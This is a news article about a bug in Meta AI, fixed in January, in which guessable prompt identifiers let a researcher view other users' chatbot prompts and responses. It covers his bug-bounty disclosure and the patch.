Meta AI was reportedly found to have a security vulnerability that could allow unauthorized access to users’ private interactions with its chatbot. This flaw did not necessitate compromising Meta’s server infrastructure or altering the application’s code; instead, it could be exploited through an analysis of network traffic. A researcher identified this bug late last year and subsequently alerted the Menlo Park-based tech firm. Following this discovery, Meta implemented a fix in January and awarded the researcher for their efforts in exposing the exploit.
According to a TechCrunch report, the vulnerability in Meta AI was unearthed by Sandeep Hodkasia, the founder of AppSecure, a security testing company. The researcher communicated the issue to Meta in December 2024, earning a bug bounty of $10,000 (approximately Rs. 8.5 lakh) for his findings. Ryan Daniels, a spokesperson for Meta, confirmed to the publication that the problem was resolved in January and noted that there were no signs of malicious exploitation by bad actors.
The vulnerability was linked to how Meta AI processed user prompts on its servers. According to the researcher, the AI chatbot assigns a unique identifier to each prompt alongside the generated responses when users edit these entries to regenerate text or images. Such instances are typically commonplace, as users often seek to refine their requests for better outcomes.
Hodkasia discovered that by monitoring the browser’s network traffic while modifying an AI prompt, he could retrieve his unique identifier. By altering this number, he allegedly accessed another user’s prompt and corresponding AI output, as stated in the report. The researcher indicated that these identifiers were “easily guessable,” and locating a valid ID did not require significant effort.
The core issue stemmed from the AI system’s insufficient security measures in handling the authorization of these unique identifiers, failing to adequately verify user access to the data. If exploited by malicious actors, this vulnerability could have jeopardized the security of a substantial amount of private user information.
Notably, a report released last month revealed that the discover feed of the Meta AI app contained posts resembling private exchanges with the chatbot. These included requests for medical and legal advice, as well as confessions of criminal activity. In June, the company initiated a warning message to discourage users from unintentionally sharing their conversations.